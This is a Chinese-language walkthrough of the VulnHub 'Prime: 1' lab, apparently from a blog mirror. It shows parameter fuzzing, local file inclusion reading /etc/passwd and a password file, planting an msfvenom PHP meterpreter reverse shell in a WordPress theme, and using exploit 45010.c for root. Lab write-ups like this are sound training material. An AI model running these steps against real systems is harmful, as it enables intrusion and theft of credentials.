当前位置: 首页 > news >正文

prime_series_level-1靶场详解

news 2025/9/11 3:38:58

环境搭建

官网https://www.vulnhub.com/entry/prime-1,358/

直接导入靶机

解题思路

arp-scan -l

确认靶机ip为192.168.236.136

也可以使用nmap扫网段

nmap -sn 192.168.236.0/24

使用nmap扫描靶机开放的端口

nmap -sS -T5 --min-rate 10000 192.168.236.136 -sC -p- (速度较快,内容少)我习惯性这个

nmap -A -sV -T4 -p- 192.168.236.136 内容较多,速度慢

开放了22和80端口

访问80端口,查看源码也没有任何信息

使用dirb扫描目录

当然还可以使用御剑,dirsearch等

dirb http://192.168.236.136/

访问一下http://192.168.236.136/dev和http://192.168.236.136/wordpress

访问wordpress

尝试过滤扫描dirb http://192.168.236.136 -X .txt,.php,zip

 

尝试访问这三个文件:index.php,image.php,secret.txt

提示说要找到location.txt才能进行下一步

使用wfuzz工具爆破传参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.136/index.php?FUZZ

发现长度宽度都一样

使用wfuzz过滤出不同的值

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.236.136/index.php?FUZZ

直接访问/index.php?file=location.txt

curl http://192.168.236.136/index.php?file=location.txt

提示显示:secrettier360是正确的参数,file只是过渡而已

尝试curl http://192.168.236.136/index.php?secrettier360=aaa

curl http://192.168.236.136/image.php?secrettier360=aaa试试

提示说找到了正确的参数

使用curl http://192.168.236.136/image.php?secrettier360=/etc/passwd读取敏感文件

后面提示说找password.txt,并且在/home/saket里面

刚才只扫到一个index.php和一个image.php所以这里只能利用image.php

使用curl http://192.168.236.136/image.php?secrettier360=/home/saket/password.txt

给了一串特殊字符follow_the_ippsec猜测是密码

尝试ssh登录:ssh -p 22 victor@192.168.236.136

ssh登录失败,尝试其他登录方式

使用前面扫描出来的wordpress登录试试

使用cmseek搜集web指纹信息

cmseek -u http://192.168.236.136/wordpress/

或者使用wpscan扫描wordpress

wpscan --url http://192.168.236.136/wordpress/ --enumerate u

显示只有一个用户victor

登录wordpress

登录成功

找后门上传点

利用msfMsfvenom命令总结大全中已有payload(php/meterpreter/reverse_tcp)生成shell.php。打开shell.php文件,将内容复制到secret.php中。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=7777 -o shell.php
      -p选择相应payload
      lhost=本地IP
      lport=监听端口
      -o 指定输出文件的位置

将secret.php文件上传成功后,使用msf见天模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。

要和生成的payload对应一致

使用msfconsole

使用监听模块 use exploit/multi/handler

跟之前生成payload的对应 set payload php/meterpreter/reverse_tcp

设置自己ip set lhost 192.168.236.128

设置端口 set lport 7777

开始监听 run和exploit都可以

让网站触发这个php反弹shell

访问这个文件

wordpress文件都在这个路径下

http://192.168.236.136/wordpress/wp-content/themes/twentynineteen/secret.php

打开msfconsole查看漏洞数据库

使用searchsploit 16.04 Ubuntu查找

发现只有这个符合,并且给了提权脚本

在msf数据漏洞库下载45010.c的提权脚本

msf脚本数据库路径/usr/share/exploitdb/exploits/linux/local

将脚本copy下来,使用gcc编译

上传45010

upload /root/45010(本机文件) /tmp/45010(靶机root目录)

发现版本报错glibc的版本不对(glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc)

两个方法,要么kali下载对应版本(主要是我kali刚刚更新) ,要么升级Ubuntu的glibc版本(本来就是渗透进去的)

我选择第三种方法,找一个以前版本的kali 2021,就可以解决了。

查看root下的root.txt文件得到flag

知识点:

1、扫描局域网内的网段主机

2、扫描端口获得运行的服务

3、扫描目录获得关键信息

4、本地文件包含漏洞LF刊

5、fuzz获得正确的参数

6、wordpress漏洞利用

7、msfvenom:生成反弹shell

8、Ubuntu内核漏洞提权

内网渗透思路框架图_内网渗透路线图-CSDN博客

http://www.lryc.cn/news/307287.html

相关文章:

  • LeetCode刷题笔记之二叉树(三)
  • IBM在闪存系统集成实时恶意软件I/O检测功能
  • bpmn-js中实现xml数据转为json数据
  • HUAWEI Programming Contest 2024(AtCoder Beginner Contest 342)(A,B,C,D,E,F,G)
  • 解决Docker镜像中CentOS 8仓库问题
  • 顶顶通呼叫中心中间件-如何使处于机器人话术中的通话手动转接到坐席分机上讲解(mod_cti基于FreeSWITCH)
  • HarmonyOS—使用数据模型和连接器
  • 基于MQTT协议实现微服务架构事件总线
  • 免费的Git图形界面工具sourceTree介绍
  • 【Appium UI自动化】pytest运行常见错误解决办法
  • IDEA如何开启Dashboard
  • 【论文复现】——一种新的鲁棒三维点云平面拟合方法
  • 【C语言】学生宿舍信息管理系统
  • 用Python插入页码到PDF文档
  • LabVIEW光偏振态转换及检测仿真系统
  • scp 本地机和远程机传输文件的方法
  • 自定义神经网络二之模型训练推理
  • Java设计模式:单例模式之六种实现方式详解(二)
  • 开创5G无线新应用:笙科电子5.8GHz 射频芯片
  • 使用 JMeter 生成测试数据对 MySQL 进行压力测试
  • C# cass10 面积计算
  • 中间件-Nginx漏洞整改(限制IP访问隐藏nginx版本信息)
  • Xcode与Swift开发小记
  • 日更【系统架构设计师知识总结3】存储系统
  • 《TCP/IP详解 卷一》第7章 防火墙和NAT
  • 访问raw.githubusercontent.com失败问题的处理
  • Elasticsearch的基本安装教程,Elasticsearch+SpringBoot实现简单的增删改查功能
  • 【Git教程】(五)分支 —— 并行式开发,分支相关操作(创建、切换、删除)~
  • Maven管理项目,本地仓库有对应的jar包,但还是报找不到
  • 手写JavaScript中的Promise.all方法(JS中Promise.all的执行过程)